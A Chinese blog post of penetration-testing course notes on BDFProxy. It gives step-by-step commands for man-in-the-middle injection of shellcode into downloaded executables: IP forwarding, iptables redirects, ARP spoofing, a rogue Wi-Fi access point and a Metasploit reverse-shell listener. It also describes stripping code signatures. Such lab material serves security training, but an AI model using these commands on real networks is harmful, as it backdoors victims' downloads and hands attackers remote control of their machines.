Kali Linux渗透测试 138 后门工具--Bdfproxy

最新推荐文章于 2023-06-19 17:45:16 发布
最新推荐文章于 2023-06-19 17:45:16 发布
阅读量1.8k 收藏 7
点赞数 1
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/79931685
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 简介

  • Bdfproxy(mitmproxy)

    • 基于流量劫持(中间人攻击)动态注入 shellcode (ARP spoof、DNS spoof、Fake AP)

  • 步骤

    • sysctl -w net.ipv4.ip_forward=1
    • iptables -t nat -A PREROUTING -p tcp –dport 80/443 -j REDIRECT –to-ports 8080
    • vi /etc/bdfproxy/bdfproxy.cfg
      • proxyMode = transparent
        修改侦听 IP 地址bdfproxy

  • arpspoof -i eth0 -t 1.1.1.2 1.1.1.1

  • 启动 msf

  • 流程

    • mana 创建 Fack AP
    • badfproxy 代理注入代码
    • msf 侦听反弹 shell

2. 使用

  • 修改 IP 转发

    root@kali:~# vim /etc/sysctl.conf 
net.ipv4.ip_forward=1

  • 修改 iptables

    root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080

  • 修改配置文件

    root@kali:~# vim /etc/bdfproxy/bdfproxy.cfg
proxyMode = transparent  
HOST = 10.10.10.131     #108行,117行,128行,替换所有的,有6个

  • 启动 bdfproxy

    root@kali:~# bdfproxy

  • 启动 msfconsole

    root@kali:~# msfconsole -r /root/bdfproxy_msf_resource.rc
msf exploit(multi/handler) > jobs

  • arp 欺骗

    root@kali:~# arpspoof -i eth0 -t 10.10.10.133 10.10.10.2

  • 靶机访问浏览器下载软件,并运行

    ![](https://i.imgur.com/1qLFgFZ.png)

3. 无线流量劫持

  • vi /etc/mana-toolkit/hostapd-mana.conf

    • 修改无线 SSID 名称

  • ./usr/share/mana-toolkit/run-mana/start-nat-simple.sh

    • 修改 wlan1 无线网卡适配器并启动
    • iptables -t nat -A PREROUTING -i $phy -p tcp –dport 80/443 -j REDIRECT –to-port 8080

  • vi /etc/bdfproxy/bdfproxy.cfg

    • proxyMode = transparent
    • 修改侦听 IP 地址并启动 badfproxy

  • 启动 msf

    • msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc

  • 补充内容

    • 全站 HTTPS 防注入(微软每个补丁都带码)
    • PE 文件证书签名可被清除
    • PE Header -> Optional Header -> Certificate Table(Address and size)
      • 全部用 0 覆盖
      • BDF 默认清除数字签名

  • https://live.sysinternals.com/

    这是允许访问所有Sysinternals公用程序的文件共享。我们已经开发了这个功能来测试我们实用程序的替代分配机制。

    这将允许您从任何连接到互联网的计算机运行这些工具,而无需导航到网页,下载并解压zip文件。

    Sysinternals网站

    Sysinternals网站由Mark Russinovich于1996年创建,主办他先进的系统实用程序和技术信息。无论您是IT专业人员还是开发人员,您都可以找到Sysinternals实用程序来帮助您管理,诊断和诊断Windows系统和应用程序。

网络安全打工人
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
mana, 我们的wifi恶意AP攻击和MitM的魔法工具包也见 hostapd mana.zip
10-10
mana, 我们的wifi恶意AP攻击和MitM的魔法工具包也见 hostapd mana MANA工具包通过 Dominic ( 单) & Villiers @ sensepost ( [email protected] )概述一个rogue访问点( evilAP ) 攻击的工具包首次在 Defcon
利用NET HUNTER建立一个自动文件下载的网络接入点
weixin_30709061的博客
01-23 146
免责声明:本文旨在分享技术进行安全学习,禁止非法利用。 本文中我将完整的阐述如何通过建立一个非常邪恶的网络接入点来使得用户进行自动文件下载。整个过程中我将使用 Nexus 9 来运行Kali NetHunter 2.0,并使用TP-LINK TLWN722N (150Mbps 版本)作为我的二级网络接口。 工具(下载地址见文末) Mana – 恶意接入点工具包。它能够实现比K...
kali linuxBdfproxy
weixin_30825199的博客
03-05 347
Bdfproxy(mitmproxy) 基于流量劫持动态注入shellcode(arp欺骗,dns欺骗,流氓ap) 步骤: 开启流量转发---------sysctl -w net.ipv4.ip_forward=1 配置iptables策略 iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports...
Pocket Hacking: NetHunter实战指南
热门推荐
omnispace的博客
03-29 1万+
0x00 前言 许多朋友都希望Hacking套件可以很方便的从PC移植到更便携的手机或平板电脑上,而Offensive Security团队发布的Kali NetHunter则将这一期待变为现实,通过移动终端随时随地进行Hacking,暂且美其名曰口袋Hacking. Kali NetHunter是以Nexus(手机/平板)为基本硬件设备(新增对1+手机的支持),基于原生Android实现
[译]Rogue Wi-Fi--------Mana
iteye_16188的博客
12-26 168
参考文章:[url]https://cyberarms.wordpress.com/2014/10/16/mana-tutorial-the-intelligent-rogue-wi-fi-router/[/url] 一旦成功连接,自动运行SSLstrip来把HTTPS降级为HTTP,从而可以绕过HSTS来进行Mitm,破解Wi-Fi密码,抓取cookie,以及使用Firelamb来模拟se...
kali 虚拟机下 mana-toolkit 的安装
buran的博客
04-20 474
mana-toolkit 的GitHub地址: https://github.com/sensepost/hostapd-mana. 使用 Mana: start-noupstream.sh -Starts access point with no internet access start-nat-simple.sh -Starts an access point with internet access (use this) start-nat-full.sh -Starts a access poi
Kali linux 学习笔记(八十五)免杀——Bdfproxy 2020.4.21
闵行小鱼塘
04-21 1158
本节学习bdfproxy
kali生成后门远程控制电脑或手机
wutiangui的博客
05-07 2951
问题:Metasploit渗透测试中出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).点击.exe文件直接运行安装,运行,下一步,直接完成安装。Android模拟器(靶机1):192.168.0.106。2.1首先从官网上下载模拟器雷电地址点击打开链接。靶机:192.168.25.106。二、环境配置二Android模拟器。
后门的类型与kali生成后门如何实现,及如何使用
2301_77441874的博客
06-19 1240
小小的讲一下后门程序以及kali如何进行后门的生成以及调用。
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
BDFProxy-ng:重写BDFProxy(https
05-23
#The Backdoor Factory Proxy NextGen(BDFProxy-ng)v0.1 bdfproxy-ng是一个分支并回顾了原始BDFProxy( ) ##什么是新的 添加了对deb文件的支持(Debian和Ubuntu) 增加了对ar和xz存档的支持 增加了对mime类型而不是标头的支持 摆脱了各种库来处理不同的存档类型,只支持一种( libarchive-c ) 重构代码,添加更强大的检查 更改了版权:现在是GPL3! ##为什么要分叉,我觉得代码需要进行适当的重新设计才能添加更多功能。 另外,我不喜欢原始项目的版权:) ##如何安装您需要安装requirements.txt列出的python软件包(提示: sudo pip install -r requirements.txt )。 在此之前,您需要从数据包管理器中安装libarchive-dev
黑蛋批量IP查域名工具 V1.0
03-20
域名查询工具,批量域名查询工具,IP查询工具,域名查询,批量域名查询,IP查询采用DotNet2.0开发,能够根据IP地址查询该IP上的所有域名。能够实现批量查询。同时能够导出查询结果。
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-amd64.part1)
06-14
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-i386.ova)文件分割成 4个 压缩包,必须集齐4个 文件后才能一起解压一起使用: kali-linux-2022.2-virtualbox-amd64.part1 ...kali-linux-2022.2-virtualbox-amd...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
满意度调查行·知dr.pptx
04-25
满意度调查行·知dr.pptx
基于B2C的网上拍卖系统_秒杀与竞价.zip
04-25
基于B2C的网上拍卖系统主要用于帮助人们应用互联网方便快捷买到自己所中意的商品,并参与到秒杀与竞拍当中。 主要功能包括: 1.前台模块 (1)普通用户登录/注册。 (2)分类查看商品(普通商品与促销商品) (3)查看商品详细信息 (4)查看秒杀商品 (5)查看竞拍商品 (6)将商品加入购物车 (7)购买,结算功能 (8)留言 2.后台模块 (1)修改密码 (2)商品管理: -- 编辑/删除 -- 设置/取消促销 (3)秒杀商品:设置/取消秒杀 (4)竞拍商品:设置/取消竞拍 (5)订单管理:查看订单 (5)留言管理:查看/删除留言 项目访问路径: 前台:http://localhost:8080/sale 后台:http://localhost:8080/sale/user/adminlogin
分布式系统中Java后端开发技术及其应用实践.pdf
最新发布
04-25
分布式系统的核心思想是复杂计算任务的拆分与并行计算,可有效减少计算时间、节约算力成本。以分布式系统中Java后端开发技术的应用为主题,分析分布式系统开发的需求,探讨Java技术栈、分布式监控与日志管理、云服务模型在分布式系统Java后端开发中的应用路径,旨在为分布式系统的设计与实现提供全面的理论分析和实践指导,以支持构建高效、稳定、可扩展的企业级Java应用。 随着云计算、大数据和人工智能技术的飞速发展, 分布式系统已成为支撑现代企业信息系统的基础架构。 Java 后端开发技术在构建分布式系统中扮演着至关重要的 角色,其应用价值和研究重点主要集中在微服务架构、容 器化技术、自动化部署、服务网格、无服务器计算、应用 程序编程接口(Application Programming Interface, API)管理、数据一致性解决方案、分布式缓存、负载均衡、 复杂事件处理和分布式事务管理等方面[1]。Java平台以 其成熟的生态系统、跨平台的移植性、丰富的开源框架 和库以及稳定的性能,为分布式系统的开发提供了坚实 的基础[2]。深入探讨Java后端开发技术在分布式系统中 的应用实践,旨在为企
kali linux渗透测试靶机
02-23
Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值